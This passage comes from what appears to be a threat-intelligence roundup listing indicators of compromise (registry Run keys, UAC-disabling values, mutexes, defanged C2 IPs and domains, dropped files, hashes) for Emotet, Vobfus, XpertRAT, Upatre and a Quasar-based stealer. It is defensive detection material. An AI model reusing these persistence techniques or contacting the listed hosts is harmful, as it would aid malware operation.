\n`%TEMP%\\~atmp` | 11 \n`%ProgramData%` | 10 \n`%TEMP%\\$inst` | 10 \n`%TEMP%\\$inst\\2.tmp` | 10 \n`%TEMP%\\$inst\\temp_0.tmp` | 10 \n`\\TEMP\\config.ini` | 10 \n`%ProgramFiles(x86)%\\wotsuper` | 10 \n`%ProgramFiles(x86)%\\wotsuper\\wotsuper` | 10 \n`%ProgramFiles(x86)%\\wotsuper\\wotsuper\\Uninstall.exe` | 10 \n`%ProgramFiles(x86)%\\wotsuper\\wotsuper\\Uninstall.ini` | 10 \n`%ProgramFiles(x86)%\\wotsuper\\wotsuper\\wotsuper.exe` | 10 \n`%ProgramFiles(x86)%\\wotsuper\\wotsuper\\wotsuper1.exe` | 10 \n`%SystemRoot%\\wotsuper.reg` | 10 \n`%ProgramData%\\freebl3.dll` | 9 \n`%ProgramData%\\mozglue.dll` | 9 \n`%SystemRoot%\\SysWOW64\\config.ini` | 9 \n`%APPDATA%\\Mozilla\\Firefox\\Profiles\\1LCUQ8~1.DEF\\cookies.sqlite-shm` | 9 \n`%APPDATA%\\Mozilla\\Firefox\\Profiles\\1LCUQ8~1.DEF\\cookies.sqlite-wal` | 9 \n`%ProgramData%\\msvcp140.dll` | 8 \n`%ProgramData%\\nss3.dll` | 6 \n`%HOMEPATH%\\pwordkrn.exe` | 6 \n`%ProgramData%\\softokn3.dll` | 5 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0034790f990238fe8e57d28800a8498bce5bdf3604cc56fc670ac5d65c6e5e08 249de6212474007cb9cf42a68939fae2f769f2097a57afa664a4780b2641228e 275eb1700ac5dbe3b62ce16a06409c4866728f72ee9e5c10f43beba094038475 48ab169b253421d2ece727161c6ff26c47836d5905fa685812010c6de4b75b27 681297a82e85822a1cb5a58296a515151f417bb8aafe5d4505d2219b4fe61438 70576eb8cd35093b1ef56da7fb39bf88f32c57f410484d613b5028cecbb1b0df 743238d01b2f968044ee2b175c61574aca518874c67201146f19df5a53c3b0d2 7e71eda28ecca392d6e86a9004c3bd38c7cbdf79399e90742feac5fa066aba66 a6abe3b046e8bdcfb33fa9776195fbb89a3e4218f6bb281aedd15f28fe1f4818 bad303ab4b68379128469e3be92d5bf3b23ec7bb285a260b1fadeead3fe43bbf bc55f494359805cc4d89f6812c3a1a14d593d9ead82267dcae7029dcbddebcab be2201940b246ae89cae4f6d0a691a1092289868230f1da85f9142d180709744 c66fe1a34cbe3a966ecbd1beb87b425e004a4a21f38bd483c2c10ef7c77e5e0b c8a3cb15adb8639ceaa0092b3a7f69f362cb48bcd96ffd18d362a38a1fbfff41 d39e3e47d12347b27f81a75751145bf6915b6a12caffa2dc4b0981666339c3bb e0b5780569ee0983401f373b03909ba27babc52c258eb150939e0b9d337de594 eaa8bbd1fee19574eeed935d8756223876c64d3ca49b372c04b98b6912108586 f34e64f4e7be7e6b2c665700ec513b4783e570a4de2087ac9511f152d812b2f5 f4b4158338fe30016fb7034b70bc3babcee3be21ea5c214451d83e3cb31233d8 fdbad2f7d47f6b60b5eb5a7110c150bc89932fdf47d224a4e31d8f091ee8dc58 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-okD3nsZ3jwI/XitOphUI3PI/AAAAAAAADKs/Git5ndVq3H02WOrg61YQTOjzMBf_dk4OQCLcBGAsYHQ/s1600/fdbad2f7d47f6b60b5eb5a7110c150bc89932fdf47d224a4e31d8f091ee8dc58_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Doc.Malware.Emotet-7544675-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Type ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Start ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ErrorControl ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ImagePath ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: DisplayName ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: WOW64 ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ObjectName ` | 7 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 7 \n`Global\\M98B68E3C` | 7 \n`Global\\Nx534F51BC` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`190[.]17[.]44[.]48` | 7 \n`70[.]123[.]95[.]180` | 7 \n`74[.]220[.]194[.]30` | 7 \n`59[.]120[.]5[.]154` | 3 \n`100[.]66[.]142[.]61` | 3 \n`100[.]108[.]145[.]200` | 3 \n`100[.]87[.]27[.]180` | 3 \n`100[.]83[.]251[.]131` | 3 \n`100[.]90[.]84[.]106` | 3 \n`17[.]36[.]205[.]74` | 2 \n`74[.]202[.]142[.]71` | 2 \n`24[.]232[.]0[.]227` | 2 \n`200[.]45[.]191[.]16` | 2 \n`74[.]202[.]142[.]98/31` | 2 \n`51[.]77[.]113[.]100` | 2 \n`98[.]103[.]188[.]70` | 1 \n`200[.]107[.]202[.]33` | 1 \n`67[.]212[.]168[.]237` | 1 \n`85[.]115[.]130[.]101` | 1 \n`206[.]126[.]59[.]246` | 1 \n`162[.]211[.]85[.]171` | 1 \n`80[.]93[.]143[.]50` | 1 \n`203[.]130[.]9[.]8` | 1 \n`192[.]185[.]21[.]150` | 1 \n`192[.]185[.]2[.]205` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`jayracing[.]com` | 10 \n`rcmgdev44[.]xyz` | 3 \n`demu[.]hu` | 3 \n`itconsortium[.]net` | 3 \n`josemoo[.]com` | 3 \n`smtp[.]prodigy[.]net[.]mx` | 2 \n`smtp[.]fibertel[.]com[.]ar` | 2 \n`smtp[.]infinitummail[.]com` | 2 \n`smtp[.]arnet[.]com[.]ar` | 2 \n`smtp[.]dsl[.]telkomsa[.]net` | 2 \n`mail[.]1and1[.]com` | 1 \n`smtp[.]tcc-la[.]com` | 1 \n`smtp[.]indisa[.]cl` | 1 \n`mail[.]cemcol[.]hn` | 1 \n`mail[.]cobico[.]co` | 1 \n`cowealth[.]com[.]tw` | 1 \n`mail[.]an-car[.]it` | 1 \n`mail[.]argo[.]ge` | 1 \n`smtp[.]1und[.]de` | 1 \n`mail[.]fracma[.]co` | 1 \n`mail[.]castel[.]ge` | 1 \n`smtpvip[.]reis[.]mx` | 1 \n`mail[.]stscambodia[.]com` | 1 \n`smtp[.]netvoice[.]com[.]ph` | 1 \n`mail[.]mygrande[.]net` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\229.exe` | 10 \n \n#### File Hashes\n\n` 0c9ef55223b45ef57ef38a98bbb1675f4bb284af6a56f9157e4c86b864360719 412e213dd241031a172b48a422bbcf8e3e0b45e89a984fc45028fa96299f459a 42e61e25f4b3d2b57fa973344417602c6e43537eeef6f7fdf32f9d34bf8f3604 6c4c28356c53832f5ab0a5acc2a14f4f907188655dd315bf1e18581c4c48337e 70dc1946d77ef19522ccc9d18629e8777283a715d3fa055ff7f0559331db3e26 81c603712c753de8200c0cb6dd28d6b37ac2873b968bdf8929ca129d35195d4a ac2b7c9be4cf9cf5b2e4a564a5fa312243e665dd31463448c975f38664de56f2 ca1e6ff31df37242aa2e09a4cb29b7546dd408c0b0de26dd2a946183eea64b95 d676ecd3750ce75f42ed0c6958863e01ffbf92b5169c1899513b0affc952b9de dfe5f28fde5c483ba38aff7def0df3938ae4837acb81cba696f57159fa6fa0b6 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-gV0Kg_wsci0/XitO7DAGmCI/AAAAAAAADK4/3Bom7M6r2bUku4gUhx64U6HUOjRzwII8wCLcBGAsYHQ/s1600/ac2b7c9be4cf9cf5b2e4a564a5fa312243e665dd31463448c975f38664de56f2_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-NaI3QAoenqI/XitO_Iz5IVI/AAAAAAAADK8/UYM3l_MHlbgV-BpasI6bQorRu1zC3S6swCLcBGAsYHQ/s1600/ac2b7c9be4cf9cf5b2e4a564a5fa312243e665dd31463448c975f38664de56f2_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-FsJjlnWcGqE/XitPEf3ivLI/AAAAAAAADLA/zKf79XkTJeE2rLbSMz60SumpCzd2b2MaACLcBGAsYHQ/s1600/ac2b7c9be4cf9cf5b2e4a564a5fa312243e665dd31463448c975f38664de56f2_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Worm.Vobfus-7541859-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: WindowsDefender ` | 7 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: WindowsDefender ` | 7 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: WindowsDefender ` | 7 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: WindowsDefender ` | 7 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: update ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: update ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: update ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: update ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: BWOJ39VGEPRBJ ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: BWOJ39VGEPRBJ ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: BWOJ39VGEPRBJ ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: BWOJ39VGEPRBJ ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: IOAUWN4A3W4AA ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: IOAUWN4A3W4AA ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: IOAUWN4A3W4AA ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: IOAUWN4A3W4AA ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 8L9ROXIFMECH6 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 8L9ROXIFMECH6 ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: 8L9ROXIFMECH6 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: 8L9ROXIFMECH6 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: HE8MRP3X92SVO ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: HE8MRP3X92SVO ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: HE8MRP3X92SVO ` | 1 \nMutexes | Occurrences \n---|--- \n`<random, matching [a-zA-Z0-9]{5,9}>` | 7 \n`HCQZLMB9VOLD` | 1 \n`1HZYRMUIRQ` | 1 \n`REYUIW9NA8LY` | 1 \n`bv1lr78956835` | 1 \n`MUA192KRR0N` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`172[.]217[.]11[.]46` | 2 \n`172[.]217[.]9[.]206` | 2 \n`188[.]138[.]114[.]61` | 1 \n`178[.]128[.]111[.]183` | 1 \n`77[.]79[.]13[.]204` | 1 \n`195[.]201[.]196[.]115` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]altervista[.]org` | 1 \n`divine-vps[.]com` | 1 \n`moddersondazone[.]net` | 1 \n`khant[.]info` | 1 \n`applesupportforums[.]com` | 1 \n`underground-logs[.]tk` | 1 \n`www[.]emmek[.]altervista[.]org` | 1 \n`khant[.]me` | 1 \n`imscuh[.]com` | 1 \n`rtrforums[.]com` | 1 \n`tripsschool[.]netfirms[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\windefender.exe.jpg` | 6 \n`%TEMP%\\update.exe.jpg` | 1 \n`%TEMP%\\8c5gucto.exe.jpg` | 1 \n`%TEMP%\\f5qrnr2jfk.exe.jpg` | 1 \n`%TEMP%\\52qof1hoy2.exe.jpg` | 1 \n`%TEMP%\\dvpiit26.exe.jpg` | 1 \n`%TEMP%\\windefender.jpg` | 1 \n \n#### File Hashes\n\n` 171ab79cd58e2be6aeada2c137c8ab74eecf082ae2a80358e84fccd254bf760b 312b904aa6b90418558a7e9b8d25ad1f84a2ae413e542fb6a06b7aae9567957d 39154850d888f42f4a04fc19887691101aadda306311605b59aa0997ae9fd4cc 3bd1ed52b57837cbc2b072c23f9de501a7d0ed5bd3ce93d3ca7022aada5ea13f 4ca9d8cd2b950485301fb885cc1d954e7c91c03c4fd21209fe90d68426a0b073 594e3dde160ff061cabb630e7c6d8c9584e45f61bc446b03e3546d2104b25d1a 59656eb7ffde7b461f49735aa9717ab09ff883780522afa1de8d724928108b75 80f8410a8f0042edad98dc1636d6cbd6c989d5159454d86fc212eb647d413850 87a2371dc38ca7b11010496c3e4c908379596ddbd5b2eb0332817a8d18e71ea0 a92e67a93899f548c68b5d667650b0749a7ff56799ba7afd5d393bef97f946a5 e487727b0d5121e8efc6f51ffe24ce54e40f923b0d9916284b988efc4a57269e eb03d095df6d765469d088cefbd320b6cee40bc97cf1bd75ad46a115f2d3697b `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-i4w2NhZknaE/XitPRG7gQtI/AAAAAAAADLM/j-LXoTebdAQevwuPUoO_eYjqiHOPYOz-ACLcBGAsYHQ/s1600/a92e67a93899f548c68b5d667650b0749a7ff56799ba7afd5d393bef97f946a5_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.XpertRAT-7550253-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 13 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UACDisableNotify ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\X ` | 13 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 ` | 13 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 ` | 13 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\X\\RUN ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\X\\RUN \nValue Name: NOME ` | 13 \nMutexes | Occurrences \n---|--- \n`P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5` | 13 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`joeing[.]dnsfor[.]me` | 13 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\Administrator.bmp` | 13 \n`%APPDATA%\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5` | 13 \n`%APPDATA%\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5` | 13 \n`%APPDATA%\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5.exe` | 13 \n`%APPDATA%\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\\ut` | 13 \n`%TEMP%\\Westminster8.exe` | 13 \n \n#### File Hashes\n\n` 2bc7aa28fb4cab2aa55e683fa452125a29fdeaf2c8a8ad09801581ac164f6e04 33151408dca938762e705906a4da851f01d38e05ea539bc4a6b56745d1464933 3464a96f3efe37c2c852c581576c75b5f7fce51e06473317e3a927867959cd9e 395a63b07a1275522ed8867d6402abba3b81bfcafedfdd4cc42d9d7b12b03868 45df177c92177a1766adb8e57b49b588f80d5534a84f0fc91d3ce296c7793052 75dc81fe9a84e7abecc35834a59574fa6975df9dafede10ec32090c054b2a7e4 8cd515edb041f9591d71885cf5e51253f9c0569fcfae06a73e14dbfef7d6f5ef 964354f86010cf35a07fc0e8ac11c0e653409338c42cfc132d8876b0fc64d3e7 a78e29a18072a0287261c696aac850b3a2f67087e1167f7b867eff84075655ab ab4e72ae86ecc5ec5fd7fe5e727ebc069c4803fd34e975c6054fa85cf4a73f8a af2f58c80a13d01953ff089503666772bbafa371fe61eadd8561aca0026ff856 ce56803cae1069908fc47087d6d8fbd1278ae72bc36966694e35da564822446e dc5771d054a00e41f0cceb59ab59bf154b5e56d6fbff9db7a2713a5728254bbb `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Fd5X3JcT4pA/XitPhSd5vRI/AAAAAAAADLY/9a9jN4DUEqUNsyPZh3UMuLH3JbNgJD9JgCLcBGAsYHQ/s1600/af2f58c80a13d01953ff089503666772bbafa371fe61eadd8561aca0026ff856_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-VWcRyD5neiQ/XitPlU8bQFI/AAAAAAAADLc/24DqGS6JuB8sBCmQvZHVodc-25GmClNOQCLcBGAsYHQ/s1600/af2f58c80a13d01953ff089503666772bbafa371fe61eadd8561aca0026ff856_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Upatre-7549404-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: a2fc9eb ` | 8 \nMutexes | Occurrences \n---|--- \n`qazwsxedc` | 9 \n`Local\\MSCTF.Asm.Mutexsssssssssssss1` | 8 \n`Local\\MSCTF.CtfMonitorInstMutexsssssssssssss1` | 8 \n`Global\\b54c4621-3b1b-11ea-a007-00501e3ae7b5` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`93[.]118[.]36[.]235` | 8 \n`197[.]255[.]147[.]146` | 8 \n`136[.]243[.]69[.]220` | 8 \n`81[.]169[.]145[.]67` | 8 \n`178[.]254[.]50[.]156` | 8 \n`202[.]172[.]26[.]26` | 8 \n`134[.]0[.]11[.]125` | 8 \n`157[.]7[.]107[.]174` | 8 \n`213[.]186[.]33[.]3` | 7 \n`46[.]105[.]57[.]169` | 7 \n`166[.]62[.]113[.]120` | 7 \n`46[.]30[.]215[.]33` | 7 \n`212[.]48[.]68[.]63` | 7 \n`208[.]117[.]38[.]143` | 7 \n`5[.]39[.]73[.]158` | 7 \n`3[.]114[.]58[.]184` | 6 \n`37[.]58[.]63[.]231` | 6 \n`81[.]19[.]159[.]64` | 6 \n`198[.]199[.]67[.]86` | 6 \n`185[.]227[.]80[.]58` | 6 \n`211[.]1[.]226[.]76` | 3 \n`192[.]35[.]177[.]64` | 2 \n`203[.]189[.]109[.]240` | 2 \n`213[.]186[.]33[.]87` | 1 \n`46[.]166[.]187[.]64` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`schema[.]org` | 8 \n`api[.]w[.]org` | 8 \n`gmpg[.]org` | 8 \n`recaswine[.]ro` | 8 \n`pendletonforhouse[.]com` | 8 \n`ecocalsots[.]com` | 8 \n`www[.]riesa[.]de` | 8 \n`gestes-argile[.]com` | 8 \n`feuerwehr-stadt-riesa[.]de` | 8 \n`treatneuro[.]com` | 8 \n`national-drafting[.]com` | 8 \n`dupdiesel[.]co[.]za` | 8 \n`has-gulvakfi[.]com` | 8 \n`domaine-cassillac[.]com` | 8 \n`cerenalarmkamera[.]com` | 8 \n`definitionen[.]de` | 8 \n`eatside[.]es` | 8 \n`takatei[.]com` | 8 \n`www[.]takatei[.]com` | 8 \n`themeisle[.]com` | 7 \n`www[.]ovh[.]co[.]uk` | 7 \n`plexipr[.]com` | 7 \n`paintituppottery[.]com` | 7 \n`viralcrazies[.]com` | 7 \n`camlavabolari[.]com` | 7 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\Start Menu\\Programs\\Startupx\\system.pif` | 8 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startupx\\system.pif` | 8 \n`%APPDATA%\\a2fc9eb` | 8 \n`%APPDATA%\\a2fc9eb\\ea2fc9.exe` | 8 \n`%APPDATA%\\8ddb21f\\88ddb2.exe` | 5 \n`%HOMEPATH%\\HELP_FILE_430D48DC3.png` | 1 \n`%HOMEPATH%\\HELP_FILE_530D48DC3.html` | 1 \n`%HOMEPATH%\\HELP_FILE_530D48DC3.png` | 1 \n`%HOMEPATH%\\HELP_FILE_630D48DC3.html` | 1 \n`%HOMEPATH%\\HELP_FILE_630D48DC3.png` | 1 \n`%HOMEPATH%\\HELP_FILE_730D48DC3.html` | 1 \n`%HOMEPATH%\\HELP_FILE_730D48DC3.png` | 1 \n`%HOMEPATH%\\HELP_FILE_830D48DC3.html` | 1 \n`%HOMEPATH%\\HELP_FILE_830D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_130D48DC3.html` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_130D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_230D48DC3.html` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_230D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_330D48DC3.html` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_330D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_430D48DC3.html` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_430D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_530D48DC3.html` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_530D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_630D48DC3.html` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 04e7c9d7cb59d57085636e06d1e30098ab81f85805bc9ac6c4c9270d697d6e96 434ff7bfd6a752f3c56c20d8a7e8853a94e99be9d112442eed257ee42800e957 49a97e5e68d188e423af3eebe2b3a62d2a285006d42c5dfd10cfdbe534534c91 61e76a0e801cb7a30221f4075ec8c5fc733cc7b3d5bda520551b8bd053f101d2 8f237cc28360ef130227b92323a986c3136242600fc2188b92c48fad5df2f7fe 98db4c353cc79a3b9bfae516ab56fab19166d2fed1f108cbff33447cc2feac33 a27d8ad3e0ef1d792cc6504a41d3eaecf11802d03fdbfb08c811217759f2d965 de940e24beca778c6d8afd8b625eeaff0549342ce061fd75ce817d2d5add612c e67b98c9041d13d17904f65f875e840c7f40cbf60fdc25c0767fefc5c57cb634 eccb6d79ce6669a5e4fb1f394f920224fe40d0dd782c8dd12cf4004c81c32765 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/--gH0fgsBuvg/XitP6mbuwEI/AAAAAAAADLo/x5bZ5eRZZLs3BOF3YTpnC6Uqj_Yx2cFrACLcBGAsYHQ/s1600/04e7c9d7cb59d57085636e06d1e30098ab81f85805bc9ac6c4c9270d697d6e96_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-DmERPFrZuX0/XitP-qGIHNI/AAAAAAAADLs/BII7BCDux3Mem3FsI6v9tUjcuy4XlYRLQCLcBGAsYHQ/s1600/04e7c9d7cb59d57085636e06d1e30098ab81f85805bc9ac6c4c9270d697d6e96_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-PxNRLnZXhds/XitQFKfOmWI/AAAAAAAADLw/PWWWGLn0Ec45CrbpBkDetWktWeu2fx2tQCLcBGAsYHQ/s1600/434ff7bfd6a752f3c56c20d8a7e8853a94e99be9d112442eed257ee42800e957_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Passwordstealera-7544289-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Quasar Client Startup ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: java ` | 4 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Java ` | 4 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: error pending ` | 2 \n`<HKCR>\\LOCAL SETTINGS\\MUICACHE\\\\52C64B7E \nValue Name: LanguageList ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows startup ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: NET framework ` | 1 